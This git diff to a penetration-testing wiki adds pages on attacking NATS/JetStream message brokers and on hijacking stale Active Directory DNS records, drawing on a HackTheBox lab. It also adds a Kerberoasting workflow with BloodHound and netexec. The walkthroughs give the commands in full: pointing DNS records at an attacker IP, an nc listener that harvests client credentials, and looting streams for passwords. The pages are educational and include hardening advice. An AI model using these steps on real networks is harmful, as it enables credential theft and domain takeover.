diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 732150e0b7a..024fe5edecb 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -403,6 +403,7 @@ # 👽 Network Services Pentesting +- [4222 Pentesting Nats](network-services-pentesting/4222-pentesting-nats.md) - [Pentesting JDWP - Java Debug Wire Protocol](network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md) - [Pentesting Printers$$external:http://hacking-printers.net/wiki/index.php/Main_Page$$]() - [Pentesting SAP](network-services-pentesting/pentesting-sap.md) diff --git a/src/network-services-pentesting/4222-pentesting-nats.md b/src/network-services-pentesting/4222-pentesting-nats.md new file mode 100644 index 00000000000..a9ff09bbee7 --- /dev/null +++ b/src/network-services-pentesting/4222-pentesting-nats.md @@ -0,0 +1,97 @@ +# 4222 - Pentesting NATS / JetStream + +{{#include ../banners/hacktricks-training.md}} + +## Basic Information + +**NATS** is a high-performance message bus that speaks a simple text-based protocol: the server transmits an `INFO { ... }` JSON banner immediately after TCP connect, and the client replies with a `CONNECT {"user":"USERNAME","pass":"PASSWORD",...}` frame followed by optional `PING`/`PUB`/`SUB` commands. JetStream adds persistence primitives (Streams & Consumers) on top of the same TCP port (`4222/tcp`). TLS and authentication are optional, so many internal deployments run **plaintext AUTH**. + +* Default port: **4222/tcp** (4223+ for clustered routes) +* Stock banner fields: `"version"`, `"auth_required"`, `"jetstream"`, `"max_payload"`, `"tls_required"` + +## Enumeration + +### Banner grabbing / service probes + +```bash +nmap -p4222 -sV --script banner TARGET +# Sample output +# 4222/tcp open nats NATS.io gnatsd 2.11.3 +# | banner: INFO {"server_id":"NDo...","version":"2.11.3","proto":1,"auth_required":true,"jetstream":true,"max_payload":1048576} +``` + +The INFO frame can also be pulled manually: + +```bash +echo | nc HOST 4222 +INFO {"server_id":"NCLWJ...","version":"2.11.3","auth_required":true,"jetstream":true} +-ERR 'Authorization Violation' +``` + +Install the official CLI (Go ≥1.21) for deeper interaction: + +```bash +go install github.com/nats-io/natscli/nats@latest +nats -s nats://HOST:4222 rtt +``` + +Authentication failures immediately raise `nats: Authorization Violation`, so valid creds are required for any meaningful RPC. + +## Credential capture via DNS/service impersonation + ++ Identify stale AD DNS entries for the broker hostname (e.g. `nats-svc.domain.local`). If the record returns `NXDOMAIN`, a low-privileged domain user can recreate it thanks to default dynamic-update ACLs. See [AD DNS Records abuse](../windows-hardening/active-directory-methodology/ad-dns-records.md) for background. ++ Register the hostname to an attacker-controlled IP: + +```bash +nsupdate +> server DC_IP +> update add nats-svc.domain.local 60 A ATTACKER_IP +> send +``` + ++ Mirror the legitimate banner once, then replay it to every connecting client. NATS trusts the first `INFO` line it sees, so we only need to pipe it through a listener: + +```bash +nc REAL_NATS 4222 | head -1 | nc -lnvp 4222 +``` + ++ As soon as an internal client resolves the hijacked name, it will emit a plaintext `CONNECT` frame containing the `user` / `pass` pair and various telemetry (client name, Go version, protocol level). Because nothing past the INFO banner is required, even `nc` is enough to harvest secrets. ++ For longer engagements, run the official server locally (`git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V`). TRACE logging already shows usernames; removing the redaction helper or sniffing traffic with Wireshark reveals the full password. + +## JetStream looting & password hunting + +Once any credential is recovered (e.g. `Dev_Account_A`), store it as a CLI context to avoid retyping: + +```bash +nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!' +``` + +JetStream discovery usually follows this pattern: + +```bash +nats account info --context mirage # quotas, stream count, expiration +nats stream list --context mirage # names + message totals +nats stream info auth_logs --context mirage +nats stream view auth_logs --context mirage +``` + +Streaming teams frequently log authentication events into subjects such as `logs.auth`. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords: + +```json +{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"} +``` + +Retained secrets can then be replayed against Kerberos-only services using `netexec smb DC01 -u USER -p PASS -k`, enabling full domain compromise. + +## Hardening & detection + +* **Enforce TLS** (`tls`, `tls_required`, or mTLS via `nkey`/`creds`). Without encryption, INFO/CONNECT leaks credentials to anyone on-path. +* **Pinpoint who can update DNS** – delegate service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Combine with scavenging alerts so missing broker names cannot be silently re-claimed. +* **Disable credential logging**. Scrub secrets before publishing to subjects, set JetStream retention/age limits, and apply `deny_delete=false` only to trusted operators. +* **Monitor for banner anomalies** – repeated short-lived connections, authentication timeouts, or INFO banners that do not match the blessed template suggest spoofed servers. + +## References + +* [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html) + +{{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/5671-5672-pentesting-amqp.md b/src/network-services-pentesting/5671-5672-pentesting-amqp.md index 5dd35377b2b..9250d150064 100644 --- a/src/network-services-pentesting/5671-5672-pentesting-amqp.md +++ b/src/network-services-pentesting/5671-5672-pentesting-amqp.md @@ -24,7 +24,7 @@ PORT STATE SERVICE VERSION ```python import amqp #By default it uses default credentials "guest":"guest" -conn = amqp.connection.Connection(host="", port=5672, virtual_host="/") +conn = amqp.connection.Connection(host="IP", port=5672, virtual_host="/") conn.connect() for k, v in conn.server_properties.items(): print(k, v) @@ -33,7 +33,7 @@ for k, v in conn.server_properties.items(): ### Automatic ```bash -nmap -sV -Pn -n -T4 -p 5672 --script amqp-info +nmap -sV -Pn -n -T4 -p 5672 --script amqp-info IP PORT STATE SERVICE VERSION 5672/tcp open amqp RabbitMQ 3.1.5 (0-9) @@ -72,10 +72,21 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin - 35672-35682: used by CLI tools (Erlang distribution client ports) for communication with nodes and is allocated from a dynamic range (computed as server distribution port + 10000 through server distribution port + 10010). See [networking guide](https://www.rabbitmq.com/networking.html) for details. - 61613, 61614: [STOMP clients](https://stomp.github.io/stomp-specification-1.2.html) without and with TLS (only if the [STOMP plugin](https://www.rabbitmq.com/stomp.html) is enabled). Less than 10 devices with this port open and mostly UDP for DHT nodes. +## See also + +{{#ref}} +4222-pentesting-nats.md +{{#endref}} + ## Shodan - `AMQP` +## References + +- [CloudAMQP – RabbitMQ for beginners](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html) +- [RabbitMQ Networking Guide](https://www.rabbitmq.com/networking.html) + {{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/ad-dns-records.md b/src/windows-hardening/active-directory-methodology/ad-dns-records.md index 7b9e1c45aff..21966e25bf1 100644 --- a/src/windows-hardening/active-directory-methodology/ad-dns-records.md +++ b/src/windows-hardening/active-directory-methodology/ad-dns-records.md @@ -72,6 +72,40 @@ bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10. --- +### Internal service hijacking via stale dynamic records (NATS case study) + +When dynamic updates stay open to all authenticated users, **a de-registered service name can be re-claimed and pointed to attacker infrastructure**. The Mirage HTB DC exposed the hostname `nats-svc.mirage.htb` after DNS scavenging, so any low-privileged user could: + +1. **Confirm the record is missing** and learn the SOA with `dig`: + +```bash +dig @dc01.mirage.htb nats-svc.mirage.htb +``` + +2. **Re-create the record** toward an external/VPN interface they control: + +```bash +nsupdate +> server 10.10.11.78 +> update add nats-svc.mirage.htb 300 A 10.10.14.2 +> send +``` + +3. **Impersonate the plaintext service**. NATS clients expect to see one `INFO { ... }` banner before they send credentials, so copying a legitimate banner from the real broker is enough to harvest secrets: + +```bash +# Capture a single INFO line from the real service and replay it to victims +nc 10.10.11.78 4222 | head -1 | nc -lnvp 4222 +``` + +Any client that resolves the hijacked name will immediately leak its JSON `CONNECT` frame (including `"user"`/`"pass"`) to the listener. Running the official `nats-server -V` binary on the attacker host, disabling its log redaction, or just sniffing the session with Wireshark yields the same plaintext credentials because TLS was optional. + +4. **Pivot with the captured creds** – in Mirage the stolen NATS account provided JetStream access, which exposed historic authentication events containing reusable AD usernames/passwords. + +This pattern applies to every AD-integrated service that relies on unsecured TCP handshakes (HTTP APIs, RPC, MQTT, etc.): once the DNS record is hijacked, the attacker becomes the service. + +--- + ## Detection & hardening * Deny **Authenticated Users** the *Create all child objects* right on sensitive zones and delegate dynamic updates to a dedicated account used by DHCP. @@ -84,6 +118,7 @@ bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10. ## References -* Kevin Robertson – “ADIDNS Revisited – WPAD, GQBL and More” (2018, still the de-facto reference for wildcard/WPAD attacks) -* Akamai – “Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates” (Dec 2023) +- Kevin Robertson – “ADIDNS Revisited – WPAD, GQBL and More” (2018, still the de-facto reference for wildcard/WPAD attacks) +- Akamai – “Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates” (Dec 2023) +- [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/bloodhound.md b/src/windows-hardening/active-directory-methodology/bloodhound.md index 7c10584b51f..3f566b90ad8 100644 --- a/src/windows-hardening/active-directory-methodology/bloodhound.md +++ b/src/windows-hardening/active-directory-methodology/bloodhound.md @@ -67,6 +67,28 @@ The collectors generate JSON which is ingested via the BloodHound GUI. --- +## Prioritising Kerberoasting with BloodHound + +Graph context is vital to avoid noisy, indiscriminate roasting. A lightweight workflow: + +1. **Collect everything once** using an ADWS-compatible collector (e.g. RustHound-CE) so you can work offline and rehearse paths without touching the DC again: + +```bash +rusthound-ce -d corp.local -u svc.collector -p 'Passw0rd!' -c All -z +``` + +2. **Import the ZIP, mark the compromised principal as owned**, then run built-in queries such as *Kerberoastable Users* and *Shortest Paths to Domain Admins*. This instantly highlights SPN-bearing accounts with useful group memberships (Exchange, IT, tier0 service accounts, etc.). +3. **Prioritise by blast radius** – focus on SPNs that control shared infrastructure or have admin rights, and check `pwdLastSet`, `lastLogon`, and allowed encryption types before spending cracking cycles. +4. **Request only the tickets you care about**. Tools like NetExec can target selected `sAMAccountName`s so that each LDAP ROAST request has a clear justification: + +```bash +netexec ldap dc01.corp.local -u svc.collector -p 'Passw0rd!' --kerberoasting kerberoast.txt --spn svc-sql +``` + +5. **Crack offline**, then immediately re-query BloodHound to plan post-exploitation with the new privileges. + +This approach keeps the signal-to-noise ratio high, reduces detectable volume (no mass SPN requests), and ensures that every cracked ticket translates to meaningful privilege escalation steps. + ## Group3r [Group3r](https://github.com/Group3r/Group3r) enumerates **Group Policy Objects** and highlights misconfigurations. @@ -86,4 +108,9 @@ Group3r.exe -f gpo.log # -s to stdout PingCastle.exe --healthcheck --server corp.local --user bob --password "P@ssw0rd!" ``` +## References + +- [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html) +- [RustHound-CE](https://github.com/g0h4n/RustHound-CE) + {{#include ../../banners/hacktricks-training.md}}